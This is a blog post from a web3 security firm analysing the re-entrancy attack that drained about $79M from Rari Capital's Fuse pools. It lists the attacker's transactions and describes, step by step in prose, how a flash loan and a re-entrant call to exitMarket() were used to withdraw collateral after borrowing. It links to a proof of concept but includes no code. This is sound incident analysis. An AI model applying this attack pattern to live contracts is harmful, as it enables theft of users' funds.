Rari Capital Hack Analysis & POC

By Abdul Sami J.

Introduction

Rari capital got hacked for around $79M through a classic re-entrancy attack. Rari is a fork of compound finance which had this bug fixed earlier. It is not the first time Rari has been a victim of a hack.

Pre-requisite

  1. Rari is a fork of compound finance & compound had a known issue of re-entrancy attack whenever CTokens were borrowed through borrow() function.
  2. This was patched by the Rari team by introducing a pool-wide re-entrancy guard on CTokens.
  3. There also exists a component called “comptroller” which is responsible for functions such as providing & withdrawing collateral by calling enterMarkets() & exitMarket respectively.
  4. The comptroller contract did not have re-entrancy checks in place. The attacker exploited through the exitMarket() function which makes the deposited asset no longer a collateral meaning it can be withdrawn at any time.

The Exploit

The attacker created 2 contracts.

  1. For Exploiting Rari Fuse Pools
  2. For Receiving Profits after exploits

There were 7 pools that were affected due to this exploit (8,18,27,127,144,146,156)

  1. https://etherscan.io/tx/0xa185f63b82cbb199a435399cfd414b89ebab91485d5034cdf8861a5f958259a4
  2. https://etherscan.io/tx/0xadbe5cf9269a001d50990d0c29075b402bcc3a0b0f3258821881621b787b35c6
  3. https://etherscan.io/tx/0x0f75349606610313cb666277eeda612e72be624cae061d017e503056bbf4d8e0
  4. https://etherscan.io/tx/0x0742b138a78ad9bd5d0b55221d514637313bc64c40272ca98c8d0417a519e2e4
  5. https://etherscan.io/tx/0x254735c6c14e4d338b1cc5bca43aab6b0f395ae06085013b1b2527180d270a31
  6. https://etherscan.io/tx/0xab486012f21be741c9e674ffda227e30518e8a1e37a5f1d58d0b0d41f6e76530
  7. https://etherscan.io/tx/0x9e4d4f4ebb45d1e03813d834494045c1b6ea2adbde1b89fbe24349846c223779

We will be focusing on this specific transaction to understand the hack. https://etherscan.io/tx/0xadbe5cf9269a001d50990d0c29075b402bcc3a0b0f3258821881621b787b35c6

  1. Attacker took flashloan of 50,000 WETH & 80,000 WSTETH from Balancer vault

2. Attacker deposited 80,000 WSTETH collateral into fWSTETH-146 pool.

3. After depositing, the attacker borrowed 2397 ETH from fWSTETH-146 pool without updating the borrowers record.

https://etherscan.io/address/0x49da42a1eca4ac6ca0c6943d9e5dc64e4641e0e3#code

4. The pool triggers the fallback function of the exploiter contract while sending ether to the exploit contract where the attacker makes a re-entrant call to exitMarket() & withdraws his collateral of 80,000 WSTETH.

5. The attacker receives 2397 ETH for free & transfers it to another contract for later claiming.

6. The attacker repeats steps 1–4 until all borrowed amount is collected.

7. The attacker applies the same strategy on 7 different pools & runs away with ~$79M of profit.

Hack Yourself!

Here is the Github repo that has POC for the hack.

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
BlockApex

BlockApex

We exist to build trust in the web3 ecosystem by cultivating veterans that are experts in security, testing and audits. Visit the website: https://blockapex.io